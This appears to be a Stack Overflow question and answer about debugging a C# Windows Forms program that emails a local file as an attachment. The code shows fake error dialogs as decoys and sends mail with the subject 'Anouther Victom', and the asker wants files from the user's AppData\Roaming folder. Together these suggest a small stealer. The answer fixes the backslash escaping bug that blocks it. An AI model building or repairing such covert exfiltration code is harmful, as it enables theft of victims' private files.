# Why can't I send this email with an attachment?

Tags: c#, email

```
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Net;
using System.Net.Mail;

namespace WindowsFormsApplication1
{
  public partial class Form1 : Form
  {
    public Form1()
    {
      InitializeComponent();
    }

    public void email_send()
    {
      MailMessage mail = new MailMessage();
      SmtpClient SmtpServer = new SmtpClient("smtp.gmail.com");//the smtp server
      mail.From = new MailAddress("my email@gmail.com");//my email adress
      mail.To.Add("to_mail@gmail.com");
      mail.Subject = "Anouther Victom";
      mail.Body = "mail with attachment";

      System.Net.Mail.Attachment attachment;
      attachment = new System.Net.Mail.Attachment("C:\test.txt"); //attachment file location
      mail.Attachments.Add(attachment);

      SmtpServer.Port = 587;
      SmtpServer.Credentials = new System.Net.NetworkCredential("my email@hotmail.com", "password");
      SmtpServer.EnableSsl = true;

      SmtpServer.Send(mail);
    }

    private void button1_Click(object sender, EventArgs e)
    {
      MessageBox.Show("Error retriving download url sorce check you url or serch the help guid  for help solving this error");
    }

    private void button2_Click(object sender, EventArgs e)
    {
      MessageBox.Show("Error no mod discoverd inside of resorce file");
    }
  }
}
```

This will not send the email I want and when I tried to give a file path bigger than c\file.txt but it will not understand the C:\Users\George\AppData\Roaming or any extension I wish it to copy a resource file and email it back to me to help app development.

Comment: I don't see where you actually call `email_send`

Comment: i am going to sound so nooby but where would i include this dose this have to be introduce as a click or ...

Comment: I cleaned up your code. Please take the time to format it properly so it's readable (you can paste it in, select it all, and hit Ctrl+K or click the `{}` toolbar button). You can preview it while you're entering by looking right below your text as you type it so you can see how it will look. Also, please post only the necessary code (I removed the two empty event handlers), and don't use tab characters. It helps to get answers if we can read your code easily and only see what's needed to understand your question. Thanks. :-)

Comment: thank you i am fairly new thank you for you help

Comment: If you're looking for a tutorial, [systemnetmail.com](http://www.systemnetmail.com/) has several.

Comment: What exception do you receive when you step through it?

Answer (score 3):

your problem is `"C:\test.txt"`: `"\t"` is interpreted as a tab. You want either to use a string literal with `@"C:\test.txt"` or escape the backslash with `"C:\\test.txt"`

Comment: thank you this helped 1 of my problems